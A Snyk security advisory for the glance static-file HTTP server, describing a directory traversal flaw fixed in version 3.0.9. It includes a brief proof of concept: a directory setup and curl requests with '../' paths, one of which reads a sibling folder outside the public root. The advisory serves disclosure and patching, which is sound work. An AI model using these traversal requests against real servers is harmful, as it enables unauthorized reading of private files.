Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade glance
to version 3.0.9 or higher.
glance is a quick disposable http server for static files.
Affected versions of this package are vulnerable to Directory Traversal that allows users to read files outside the public root directory. This is related to but distinct from the vulnerability reported in CVE-2018-3715.
Run glance in a directory containing subdirectories named private
, public
and public-isprivate
, setting public
as the public root directory.
npx glance --dir "public" --verbose
Run these from the same directory:
curl --path-as-is "http://localhost:8080/../private/index.html"
This request is denied, as expected with the prior vulnerability fix.
curl --path-as-is "http://localhost:8080/../public/index.html"
This request is allowed, as expected with the functionality of the local HTTP server.
curl --path-as-is "http://localhost:8080/../public-isprivate/index.html"
This request should be denied because it is outside the public/
folder, but it is actually allowed.